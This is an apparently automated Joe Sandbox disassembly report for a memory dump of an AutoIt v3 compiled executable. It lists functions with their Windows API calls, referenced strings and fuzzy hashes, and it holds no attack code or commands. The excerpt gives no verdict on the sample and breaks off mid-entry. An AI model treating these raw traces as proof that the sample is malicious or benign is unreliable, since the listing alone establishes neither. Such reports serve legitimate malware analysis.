Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
Instruction ID: 97931805128835df756d93a575d840d8d34f71e4862d4c265ec949be594b77f1
Opcode Fuzzy Hash: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
Instruction Fuzzy Hash: 2CF0A0308209105782256FBCEC4D8AA376C9F02334BA0471BF83AC20E0EBB059E48A95

Function 0026AFF9 Relevance: 24.4, APIs: 16, Instructions: 418
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0026B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1D4
_wcslen.LIBCMT ref: 0026B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B236
_wcslen.LIBCMT ref: 0026B332

Part of subcall function 002505A7: GetStdHandle.KERNEL32(000000F6), ref: 002505C6

_wcslen.LIBCMT ref: 0026B34B
_wcslen.LIBCMT ref: 0026B366
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0026B3B6
GetLastError.KERNEL32(00000000), ref: 0026B407
CloseHandle.KERNEL32(?), ref: 0026B439
CloseHandle.KERNEL32(00000000), ref: 0026B44A
CloseHandle.KERNEL32(00000000), ref: 0026B45C
CloseHandle.KERNEL32(00000000), ref: 0026B46E
CloseHandle.KERNELBASE(?), ref: 0026B4E3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 48966a861f7a721501e73b16629e8db9a366e3b44b96ce449659ed64a37e76af
Instruction ID: d70562705ddb109a02a4cfb97b5ea98c255b9e02a6ec9310c0f9fe9d58b89b69
Opcode Fuzzy Hash: 48966a861f7a721501e73b16629e8db9a366e3b44b96ce449659ed64a37e76af
Instruction Fuzzy Hash: 5DF1CD316183419FDB15EF24D891B2FBBE0AF85314F14845DF8898B2A2DB31EC95CB92

Function 001ED730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001ED807
timeGetTime.WINMM ref: 001EDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB28
TranslateMessage.USER32(?), ref: 001EDB7B
DispatchMessageW.USER32(?), ref: 001EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
Sleep.KERNELBASE(0000000A), ref: 001EDBB1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 5ba06c609376823bf5d1df317f4ebbbdc2e9a75801f84068facc9e847250c33e
Instruction ID: 7f87927a598f218d618c0175b18fb9ecdf51a06a731f31baa68ce2c1e31e6586
Opcode Fuzzy Hash: 5ba06c609376823bf5d1df317f4ebbbdc2e9a75801f84068facc9e847250c33e
Instruction Fuzzy Hash: 35421570618B82DFD728CF25E888B6EB7E0BF46304F55465DF45687291D770E8A8CB82

Function 001E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001E2D07
RegisterClassExW.USER32(00000030), ref: 001E2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
LoadIconW.USER32(000000A9), ref: 001E2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94

Strings

TaskbarCreated, xrefs: 001E2D37
0, xrefs: 001E2CE9
+, xrefs: 001E2CF0
AutoIt v3 GUI, xrefs: 001E2D23

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
Instruction ID: 004b83cbde086464875fb0626b220fda5b8c4df2379e0238fa4aa05b385a572e
Opcode Fuzzy Hash: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
Instruction Fuzzy Hash: 3F21E3B1951348AFDB00DFA4EC5DBDDBBB8FB08701F20821AF615A62A0D7B10594CF91

Function 0022065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0022039A: CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7

GetLastError.KERNEL32 ref: 0022076F
__dosmaperr.LIBCMT ref: 00220776
GetFileType.KERNELBASE(00000000), ref: 00220782
GetLastError.KERNEL32 ref: 0022078C
__dosmaperr.LIBCMT ref: 00220795
CloseHandle.KERNEL32(00000000), ref: 002207B5
CloseHandle.KERNEL32(?), ref: 002208FF
GetLastError.KERNEL32 ref: 00220931
__dosmaperr.LIBCMT ref: 00220938

Strings

H, xrefs: 002208BD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
Instruction ID: 26d3c27f04a55462958aa6ded823c4d5fbb6e467c939d1fbe219b5fe11d78cf9
Opcode Fuzzy Hash: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
Instruction Fuzzy Hash: FBA12A32A201159FDF29EFB8EC957AE7BA0AB46310F14015DF8159B2D2DB319C62CB91

Function 001E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78

Part of subcall function 001E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001E3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001E356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0022318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002231CE
RegCloseKey.ADVAPI32(?), ref: 00223210
_wcslen.LIBCMT ref: 00223277
_wcslen.LIBCMT ref: 00223286

Strings

\, xrefs: 0022328C
Include, xrefs: 00223184, 002231C5
Software\AutoIt v3\AutoIt, xrefs: 001E3560
\Include\, xrefs: 001E3527

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: bca0fc7971dd2145e79b54c499392bfe473ea229bcafac23edc5652bc6380f6f
Instruction ID: 456cdfa807c3012600ff1ab684a0f35ecf52877922b0a52973a74a4df2847d9c
Opcode Fuzzy Hash: bca0fc7971dd2145e79b54c499392bfe473ea229bcafac23edc5652bc6380f6f
Instruction Fuzzy Hash: 4471CE71414341EEC314EF66EC898AFBBE8FF95340F504A6EF545931A1EB349A48CB62

Function 001E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001E2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001E2B9D
LoadIconW.USER32(00000063), ref: 001E2BB3
LoadIconW.USER32(000000A4), ref: 001E2BC5
LoadIconW.USER32(000000A2), ref: 001E2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001E2BEF
RegisterClassExW.USER32(?), ref: 001E2C40

Part of subcall function 001E2CD4: GetSysColorBrush.USER32(0000000F), ref: 001E2D07
Part of subcall function 001E2CD4: RegisterClassExW.USER32(00000030), ref: 001E2D31
Part of subcall function 001E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
Part of subcall function 001E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
Part of subcall function 001E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
Part of subcall function 001E2CD4: LoadIconW.USER32(000000A9), ref: 001E2D85
Part of subcall function 001E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94

Strings

#, xrefs: 001E2C16
0, xrefs: 001E2C0F
AutoIt v3, xrefs: 001E2C2F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
Instruction ID: c31604855df607c037c65a46ae0b58eca19ce5ad04a69cee36a23b1ca777e016
Opcode Fuzzy Hash: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
Instruction Fuzzy Hash: C9214F71E00354ABDB109FA5FC6DAADBFF4FB08B50F54019AE504A66A0E7B10560CF90

Function 001EB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001EBB4E

Strings

p%+, xrefs: 001EB8DC
p#+, xrefs: 0023024F
p%+, xrefs: 001EBB32
x#+, xrefs: 00230207
p#+, xrefs: 00230263
p#+, xrefs: 001EBA72
p#+, xrefs: 001EBB6B
x#+, xrefs: 00230168

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#+$p#+$p#+$p#+$p%+$p%+$x#+$x#+
API String ID: 1385522511-3692600298
Opcode ID: 8c8c4346f09f1436c22bb337855641d77beeef8001e60e0c7e3fd1614cfed56f
Instruction ID: 78d087a60ead0c45ff9dd6eb58a2dcef41341811e2e1de1eb1ffc80d84dc356f
Opcode Fuzzy Hash: 8c8c4346f09f1436c22bb337855641d77beeef8001e60e0c7e3fd1614cfed56f
Instruction Fuzzy Hash: B832FDB0A0864ADFDB24CF55C8E4ABFB7B5EF44300F158099E905AB361C774AD91CBA1

Function 001E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001E316A,?,?), ref: 001E31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001E316A,?,?), ref: 001E3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001E316A,?,?), ref: 001E3232
CreatePopupMenu.USER32 ref: 001E3246
PostQuitMessage.USER32(00000000), ref: 001E3267

Strings

TaskbarCreated, xrefs: 001E322D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: e833ef2cc8bea70a00d5f66079f8e44e190d6920af6952cc6a6a0acd2e1b5709
Instruction ID: 3dade38c26c789be6cada13f56c9bee6396569811925bd7b33afba9d163ea268
Opcode Fuzzy Hash: e833ef2cc8bea70a00d5f66079f8e44e190d6920af6952cc6a6a0acd2e1b5709
Instruction Fuzzy Hash: 73418B34220A81B7DB1C2F79BC1DBBD3698E705340F54022DF666872A1DB719A609761

Function 001EDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%+, xrefs: 0023302D
D%+, xrefs: 00232FDA
D%+D%+, xrefs: 001EE27E
D%+, xrefs: 001EE4B1
D%+, xrefs: 001EE1E0
Variable must be of type 'Object'., xrefs: 002332B7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: D%+$D%+$D%+$D%+$D%+D%+$Variable must be of type 'Object'.
API String ID: 0-1976735700
Opcode ID: 6fea1e5e91fba785570e32129801724ba90109bb3f667deff5aaaeecfd47226f
Instruction ID: 92b957664597a62ffc2c1b598fed72116938326f74e96519207aa0089ab75ff1
Opcode Fuzzy Hash: 6fea1e5e91fba785570e32129801724ba90109bb3f667deff5aaaeecfd47226f
Instruction Fuzzy Hash: E0C29C71A00A45CFCB28CF99C884AADB7F1FF18300F258169E956AB391D371EE51CB91

Function 001FE763 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d10m0, xrefs: 001FE815
d1r0,2, xrefs: 001FE7CE
d5m0, xrefs: 001FE99A
d1b, xrefs: 001FE87A, 001FE9B3
d0b, xrefs: 001FE7BB, 001FE835, 001FE9CC
i, xrefs: 001FEBC8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 054cf612f8eccdfffd63abc68633b912ce07b3dadf65ab07365b3d04812fd849
Instruction ID: 0e50d76f5a70b8dda8764c285d765c63afba861c4f1f62dfecb3dbb17240e381
Opcode Fuzzy Hash: 054cf612f8eccdfffd63abc68633b912ce07b3dadf65ab07365b3d04812fd849
Instruction Fuzzy Hash: F8625AB05183858FC724CF24D094AAEBBE1FF88304F15895EE5998B3A1DB71D959CF82

Function 002504D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002504F2
CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 0025052E

Strings

nul, xrefs: 00250567

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
Instruction ID: 81041f22f93feefc9b815eaa1ede6941fcb9eae0525c4070207d2fbc7b3da34d
Opcode Fuzzy Hash: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
Instruction Fuzzy Hash: 47219471910306AFDB209F39DC88A9A77B4BF44725F604A19FCA5E71E0E7709968CF24

Function 002505A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002505C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00250601

Strings

nul, xrefs: 00250639

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
Instruction ID: bc13313645baa94e1309151fa493ec1da3e16e72e1d1eb7f96464dba0c9724e6
Opcode Fuzzy Hash: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
Instruction Fuzzy Hash: 8D21B5355103069BDB209F79DC84A5A77E8BF85721F200A19FCA1E32E0D7B09974CB14

Function 001E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CCF

Strings

edit, xrefs: 001E2CAC
AutoIt v3, xrefs: 001E2C89, 001E2C8E, 001E2C8F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
Instruction ID: 90b3c9a987991f78fe84024200092a8fa8afbdf3911b083bf7c87b82b163c76c
Opcode Fuzzy Hash: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
Instruction Fuzzy Hash: E1F03A75540290BAEB300723BC1CE776EBDD7C6F50B64419EFA04A21A0E6711860DBB0

Function 002507EF Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0025080C
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00250847
EnterCriticalSection.KERNEL32(?), ref: 00250863
LeaveCriticalSection.KERNEL32(?), ref: 002508DC
ReadFile.KERNELBASE(?,?,0000FFFF,00000000,00000000), ref: 002508F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00250921

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 0125a0881bf10ed92f39f93ba0788a9b8c73963f0dac4fe5be38458e7ef26171
Instruction ID: 23cb2bf810ad37e3e92a0f5aeec90dbea3e2841ac56ecb0b4d81a9b825d49e84
Opcode Fuzzy Hash: 0125a0881bf10ed92f39f93ba0788a9b8c73963f0dac4fe5be38458e7ef26171
Instruction Fuzzy Hash: E6417C71910205EBDF14AF64DCC9AAA7778FF04310F1440A9ED04AE297DB70DE65DBA4

Function 0025030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250324
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250331
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025033E
CloseHandle.KERNELBASE(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025034B
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250358
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250365

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
